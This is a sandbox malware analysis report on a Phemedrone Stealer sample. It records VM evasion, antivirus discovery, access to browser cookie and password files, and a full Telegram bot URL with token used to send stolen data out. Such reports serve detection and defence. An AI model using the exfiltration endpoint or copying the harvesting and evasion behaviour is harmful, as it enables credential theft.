Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: qqnal04.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: qqnal04.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: qqnal04.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: \mw\csharp\Phemedrone Stealer V2.3.2\Phemedrone-Stealer\obj\Release\system.pdb source: qqnal04.exe

Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F10E73 pushad ; iretd	0_2_00007FF848F10F11
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F1794D push ebx; retf	0_2_00007FF848F1796A
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F10C88 push ebx; retf	0_2_00007FF848F10D0A
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F10C88 push es; retn 5F4Eh	0_2_00007FF848F16327
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F100BD pushad ; iretd	0_2_00007FF848F100C1
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F180E5 push ebx; ret	0_2_00007FF848F1816A

Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\qqnal04.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\qqnal04.exe	Memory allocated: 2902A010000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Memory allocated: 29043A90000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598886	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598556	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598402	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598262	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598006	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe	Window / User API: threadDelayed 1703			Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Window / User API: threadDelayed 1359			Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -598886s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -598556s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -598402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -598262s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172	Thread sleep time: -598006s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 5512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe TID: 7164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598886	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598556	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598402	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598262	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 598006	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: qqnal04.exe	Binary or memory string: VMware
Source: qqnal04.exe	Binary or memory string: Hyper-V Video
Source: qqnal04.exe	Binary or memory string: VMware Virtual
Source: qqnal04.exe, 00000000.00000002.2110061969.0000029044190000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj

Source: C:\Users\user\Desktop\qqnal04.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe

Memory allocated: page read and write | page guard

Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: qqnal04.exe, type: SAMPLE

Source: C:\Users\user\Desktop\qqnal04.exe

Queries volume information: C:\Users\user\Desktop\qqnal04.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: qqnal04.exe, 00000000.00000002.2110257867.00000290441BC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\qqnal04.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Generic Stealer

Source: Yara match	File source: 00000000.00000002.2107964117.000002903C016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2106933727.000002902BB04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2107964117.000002903BCC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2107964117.000002903BED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2107964117.000002903BAF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2107964117.000002903BCF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qqnal04.exe PID: 3008, type: MEMORYSTR

Yara detected Phemedrone Stealer

Source: Yara match	File source: qqnal04.exe, type: SAMPLE
Source: Yara match	File source: 0.0.qqnal04.exe.29029cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2018774350.0000029029CC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qqnal04.exe PID: 3008, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\qqnal04.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected Generic Stealer

Source: Yara match	File source: 00000000.00000002.2107964117.000002903C016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2106933727.000002902BB04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2107964117.000002903BCC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2107964117.000002903BED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2107964117.000002903BAF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2107964117.000002903BCF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qqnal04.exe PID: 3008, type: MEMORYSTR

Yara detected Phemedrone Stealer

Source: Yara match	File source: qqnal04.exe, type: SAMPLE
Source: Yara match	File source: 0.0.qqnal04.exe.29029cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2018774350.0000029029CC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qqnal04.exe PID: 3008, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	1 OS Credential Dumping	241 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	123 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
qqnal04.exe	44%	Virustotal		Browse
qqnal04.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://get.geHj	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
get.geojs.io	172.67.70.233	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument	false		high
https://get.geojs.io/v1/ip/geo.json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument0	qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://get.geojs.io/v1/ip/geo.json)root	qqnal04.exe	false		high
https://get.geHj	qqnal04.exe, 00000000.00000002.2106933727.000002902BC76000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://get.geojs.io	qqnal04.exe, 00000000.00000002.2106933727.000002902BC7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	qqnal04.exe, 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	qqnal04.exe	false		high
http://api.telegram.org	qqnal04.exe, 00000000.00000002.2106933727.000002902BB52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp, qqnal04.exe, 00000000.00000002.2106933727.000002902BBC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://get.geojs.io	qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp, qqnal04.exe, 00000000.00000002.2106933727.000002902BBC5000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
172.67.70.233	get.geojs.io	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591799
Start date and time:	2025-01-15 13:33:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	qqnal04.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/1@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 7 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:34:00	API Interceptor	19x Sleep call for process: qqnal04.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	DESCRIPTION.exe	Get hash	malicious	DarkCloud	Browse
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://savory-sweet-felidae-psrnd.glitch.me/	Get hash	malicious	HTMLPhisher	Browse
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Confirm Bank Statement.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	q9JZUaS1Gy.doc	Get hash	malicious	Unknown	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
172.67.70.233	http://optimize-system-upgrades.vercel.app/	Get hash	malicious	HTMLPhisher	Browse
	http://inform-customer-sale.vercel.app/	Get hash	malicious	HTMLPhisher	Browse
	https://marketing-campaign-solution.vercel.app/	Get hash	malicious	HTMLPhisher	Browse
	Itaxyhi.exe	Get hash	malicious	Phemedrone Stealer	Browse
	rukT6hBo6P.exe	Get hash	malicious	Phemedrone Stealer	Browse
	gCK3ozTL7Q.ps1	Get hash	malicious	Phemedrone Stealer	Browse
	system.exe	Get hash	malicious	Phemedrone Stealer	Browse
	upd.ps1	Get hash	malicious	Phemedrone Stealer	Browse
	DBp7mBJwqD.exe	Get hash	malicious	Phemedrone Stealer	Browse
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
get.geojs.io	http://optimize-system-upgrades.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	172.67.70.233
	http://inform-customer-sale.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	104.26.0.100
	https://resolve-alert-user.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	104.26.1.100
	https://marketing-campaign-solution.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	104.26.0.100
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.26.0.100
	Itaxyhi.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.70.233
